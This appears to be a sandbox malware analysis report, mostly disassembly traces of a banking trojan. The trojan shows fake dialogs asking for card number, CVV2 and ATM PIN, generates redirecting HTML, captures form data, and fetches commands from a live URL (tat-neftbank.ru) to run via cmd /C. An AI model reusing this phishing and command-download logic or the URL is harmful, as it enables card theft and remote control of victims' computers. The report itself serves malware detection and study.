                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 399 406941-406970 sscanf 397->399 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 399->402 403 40699b-4069a2 399->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
